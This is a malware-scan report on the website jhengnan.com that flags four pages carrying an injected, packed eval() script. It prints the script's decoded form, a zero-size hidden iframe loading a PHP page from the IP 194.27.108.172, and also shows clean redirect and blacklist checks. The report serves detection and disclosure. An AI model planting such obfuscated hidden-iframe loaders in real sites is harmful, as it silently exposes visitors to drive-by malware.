Scanned pages/files
| Request | Server response | Status |
http://www.jhengnan.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 14:46:50 GMT Location: http://www.jhengnan.com/index.html/ Server: Apache/2 Content-Length: 311 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.jhengnan.com/index.html/ | 200 OK Content-Length: 48674 Content-Type: text/html | clean |
http://track.sitetag.us/tracking.js?hash=4c92ee7232a116ad60f09619f638eb60 | 200 OK Content-Length: 2095 Content-Type: application/x-javascript | clean |
http://www.jhengnan.com/index.html/index.htm | 200 OK Content-Length: 24349 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|194||src|height|27|width|board||172|php|108|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://194.27.108.172/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://194.27.108.172/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://194.27.108.172/tag1.php"></ifee> | ||
http://www.jhengnan.com/index.html/animated_favicon1.gif | 200 OK Content-Length: 7998 Content-Type: image/gif | clean |
http://www.jhengnan.com/test404page.js | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
http://www.jhengnan.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 14:46:58 GMT Location: http://www.jhengnan.com/index.html/ Server: Apache/2 Content-Length: 311 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.jhengnan.com/index.html/index-old.htm | 200 OK Content-Length: 16108 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|194||src|height|27|width|board||172|php|108|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://194.27.108.172/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://194.27.108.172/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://194.27.108.172/tag1.php"></ifee> | ||
http://www.jhengnan.com/index.html/products-.htm | 200 OK Content-Length: 34146 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|194||src|height|27|width|board||172|php|108|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://194.27.108.172/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://194.27.108.172/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://194.27.108.172/tag1.php"></ifee> | ||
http://www.jhengnan.com/index.html/file:///D:/jhengnan10.18/index.html/products-.htm | 404 Not Found Content-Length: 445 Content-Type: text/html | clean |
http://www.jhengnan.com/index.html/serv01-.htm | 200 OK Content-Length: 14338 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|194||src|height|27|width|board||172|php|108|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://194.27.108.172/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://194.27.108.172/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://194.27.108.172/tag1.php"></ifee> | ||
http://www.jhengnan.com/index.html/products-.htm.JPG | 404 Not Found Content-Length: 413 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jhengnan.com
Result:
GET / HTTP/1.1
Host: jhengnan.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: jhengnan.com
Referer: http://www.google.com/search?q=jhengnan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jhengnan.com
Referer: http://www.google.com/search?q=jhengnan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jhengnan.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jhengnan.com/
Result: jhengnan.com is not infected or malware details are not published yet.
Result: jhengnan.com is not infected or malware details are not published yet.